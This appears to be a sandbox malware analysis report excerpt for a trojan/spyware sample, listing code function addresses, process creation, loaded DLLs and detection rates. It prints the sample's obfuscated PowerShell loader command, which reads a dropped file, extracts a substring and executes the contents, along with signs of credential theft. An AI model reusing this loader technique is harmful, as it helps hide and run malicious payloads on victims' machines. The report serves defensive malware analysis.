          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046BDF113_2_046BDF11
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046BE7CF3_2_046BE7CF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046BE7C03_2_046BE7C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046BE7D03_2_046BE7D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046B1F983_2_046B1F98
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E34603_2_046E3460
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046EBC403_2_046EBC40
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E7B783_2_046E7B78
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E81D03_2_046E81D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E8FB03_2_046E8FB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046ECE6F3_2_046ECE6F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046EAE7F3_2_046EAE7F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E4A783_2_046E4A78
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E64783_2_046E6478
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E6E723_2_046E6E72
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E6E703_2_046E6E70
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046EEE703_2_046EEE70
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E00403_2_046E0040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E1A413_2_046E1A41
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E345F3_2_046E345F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046EEE5F3_2_046EEE5F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E1A503_2_046E1A50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E9C503_2_046E9C50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E34503_2_046E3450
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046EBC2F3_2_046EBC2F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E46203_2_046E4620
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046EFC203_2_046EFC20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E9C3F3_2_046E9C3F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E60303_2_046E6030
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046EDC303_2_046EDC30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E00303_2_046E0030
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E30083_2_046E3008
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E30073_2_046E3007
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046EAA003_2_046EAA00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046EDC1F3_2_046EDC1F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E6A183_2_046E6A18
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E00123_2_046E0012
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E46103_2_046E4610
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046EA0E03_2_046EA0E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E08E03_2_046E08E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E08F03_2_046E08F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E22F03_2_046E22F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046EF2F03_2_046EF2F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E72C83_2_046E72C8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046EE0C03_2_046EE0C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046EC0C03_2_046EC0C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E4ED03_2_046E4ED0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046EC0D03_2_046EC0D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046EA0D03_2_046EA0D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E1EA83_2_046E1EA8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E38B83_2_046E38B8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E72B83_2_046E72B8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046EE0B03_2_046EE0B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E64883_2_046E6488
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046ECE803_2_046ECE80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E04983_2_046E0498
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E1E983_2_046E1E98
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046EAE903_2_046EAE90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E7B693_2_046E7B69
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046EC5603_2_046EC560
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E7B773_2_046E7B77
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046EA5703_2_046EA570
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046EC54F3_2_046EC54F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E0D483_2_046E0D48
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E27493_2_046E2749
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046EE5403_2_046EE540
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046EA55F3_2_046EA55F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E27583_2_046E2758
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046EE5503_2_046EE550
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E53283_2_046E5328
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E77223_2_046E7722
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E77203_2_046E7720
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046EB3203_2_046EB320
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E23003_2_046E2300
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046EF3003_2_046EF300
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046ED3003_2_046ED300
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046ED3103_2_046ED310
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046EB3103_2_046EB310
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E15E83_2_046E15E8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046EE9E03_2_046EE9E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046EC9E03_2_046EC9E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E15F83_2_046E15F8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E2FF93_2_046E2FF9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046EC9F03_2_046EC9F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046EA9F03_2_046EA9F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E97C03_2_046E97C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E5BD83_2_046E5BD8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046EE9D03_2_046EE9D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E2BAF3_2_046E2BAF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E11A03_2_046E11A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046ED7A03_2_046ED7A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E2BA03_2_046E2BA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046EB7A03_2_046EB7A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E8FA13_2_046E8FA1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E2BB03_2_046E2BB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046EB7B03_2_046EB7B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E97B03_2_046E97B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E57803_2_046E5780
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046EF7813_2_046EF781
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E119F3_2_046E119F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046EF7903_2_046EF790
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046E11903_2_046E1190
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_046ED7913_2_046ED791
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047044783_2_04704478
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047068483_2_04706848
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04704B983_2_04704B98
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470A6703_2_0470A670
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047024773_2_04702477
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470D1783_2_0470D178
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04708E783_2_04708E78
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047050603_2_04705060
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470E9603_2_0470E960
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470A6603_2_0470A660
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047044673_2_04704467
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04707B683_2_04707B68
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04701B683_2_04701B68
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470D1683_2_0470D168
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470636F3_2_0470636F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047093503_2_04709350
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047050503_2_04705050
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470E9513_2_0470E951
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04707B573_2_04707B57
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04701B583_2_04701B58
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470BE583_2_0470BE58
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04703B583_2_04703B58
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047000403_2_04700040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470D6403_2_0470D640
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470BE473_2_0470BE47
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047012483_2_04701248
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04703B483_2_04703B48
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470934B3_2_0470934B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047080303_2_04708030
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047012373_2_04701237
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470AB383_2_0470AB38
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047032383_2_04703238
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047068383_2_04706838
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470C3203_2_0470C320
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047080203_2_04708020
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047055283_2_04705528
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047009283_2_04700928
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470EE283_2_0470EE28
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470AB283_2_0470AB28
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470322B3_2_0470322B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470D62F3_2_0470D62F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04706D103_2_04706D10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047098103_2_04709810
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470C3103_2_0470C310
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047000113_2_04700011
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470EE173_2_0470EE17
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047009183_2_04700918
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047098183_2_04709818
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047029183_2_04702918
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047055193_2_04705519
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470B0003_2_0470B000
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04706D003_2_04706D00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047029083_2_04702908
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470DB083_2_0470DB08
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047059F03_2_047059F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470F2F03_2_0470F2F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470AFF33_2_0470AFF3
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047084F83_2_047084F8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04701FF83_2_04701FF8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470DAF83_2_0470DAF8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04709CE03_2_04709CE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470C7E03_2_0470C7E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470F2E03_2_0470F2E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047084E73_2_047084E7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04703FE83_2_04703FE8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470C7E83_2_0470C7E8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04701FE83_2_04701FE8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470DFD03_2_0470DFD0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047071D83_2_047071D8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047016D83_2_047016D8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04703FD83_2_04703FD8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04709CDB3_2_04709CDB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047059DF3_2_047059DF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047089C03_2_047089C0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047016C83_2_047016C8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470B4C83_2_0470B4C8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047036C83_2_047036C8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047071C83_2_047071C8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470CCB03_2_0470CCB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047089B13_2_047089B1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470B4B73_2_0470B4B7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04705EB83_2_04705EB8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04700DB83_2_04700DB8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470F7B83_2_0470F7B8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047036B93_2_047036B9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470DFBF3_2_0470DFBF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047076A03_2_047076A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470CCA03_2_0470CCA0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470F7A73_2_0470F7A7
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470A1A83_2_0470A1A8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04702DA83_2_04702DA8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04705EA83_2_04705EA8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04700DAB3_2_04700DAB
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470B9903_2_0470B990
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047076913_2_04707691
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470E4983_2_0470E498
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047004983_2_04700498
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04702D983_2_04702D98
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470A19B3_2_0470A19B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047063803_2_04706380
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470FC803_2_0470FC80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470B9803_2_0470B980
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04708E883_2_04708E88
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047024883_2_04702488
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_04704B883_2_04704B88
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_047004893_2_04700489
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_0470E48A3_2_0470E48A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_060107603_2_06010760
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_060123003_2_06012300
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_060100403_2_06010040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_06010E483_2_06010E48
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_060115303_2_06011530
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_06011C183_2_06011C18
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_060107503_2_06010750
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_060122F13_2_060122F1
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_060100113_2_06010011
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_06010E383_2_06010E38
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_060115213_2_06011521
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_06011C083_2_06011C08
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_223080783_2_22308078
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_223004483_2_22300448
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_2230544D3_2_2230544D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 3_2_223015283_2_22301528
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsa3CC1.tmp\nsExec.dll 5E66489393F159AA0FD30B630BB345D03418E9324E7D834B2E4195865A637CFE
          Source: 4PYRGCo1Di.exeStatic PE information: invalid certificate
          Source: 4PYRGCo1Di.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/34@6/6
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeCode function: 0_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040348F
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeCode function: 0_2_00404950 CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404950
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeCode function: 0_2_00402208 CoCreateInstance,0_2_00402208
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeFile created: C:\Users\user\Pictures\downtreadingJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2548:120:WilError_03
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeFile created: C:\Users\user\AppData\Local\Temp\nsv2F05.tmpJump to behavior
          Source: 4PYRGCo1Di.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: msiexec.exe, 00000003.00000002.2193215280.000000002040A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2193215280.00000000203EC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2193215280.00000000203FC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2193215280.000000002042F000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2193215280.000000002043C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: 4PYRGCo1Di.exeVirustotal: Detection: 69%
          Source: 4PYRGCo1Di.exeReversingLabs: Detection: 50%
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeFile read: C:\Users\user\Desktop\4PYRGCo1Di.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\4PYRGCo1Di.exe "C:\Users\user\Desktop\4PYRGCo1Di.exe"
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$nybyggedes=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Chancebilister.Kon';$Trichopteron=$nybyggedes.SubString(53919,3);.$Trichopteron($nybyggedes)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$nybyggedes=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Chancebilister.Kon';$Trichopteron=$nybyggedes.SubString(53919,3);.$Trichopteron($nybyggedes)"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
